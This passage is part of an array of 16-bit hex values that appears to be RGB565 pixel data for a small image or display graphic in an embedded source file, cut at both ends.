0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xe8e4, 0xffff, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xe8e4, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 